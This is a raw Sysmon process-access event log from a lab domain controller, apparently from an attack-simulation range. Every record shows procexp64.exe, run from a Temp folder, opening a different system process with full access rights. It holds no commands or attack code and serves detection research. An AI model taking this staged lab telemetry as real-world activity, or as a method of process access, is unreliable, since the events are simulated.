15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784471Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784470Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784469Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784468Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784467Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784466Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784465Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784464Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784463Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784462Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784461Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784460Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784459Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784458Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784457Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784456Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784455Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784454Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784453Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784452Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784451Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784450Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784449Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784448Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784447Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784446Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784445Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784444Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784443Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784442Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784441Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784440Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784439Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784438Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784437Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784436Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784435Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784434Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 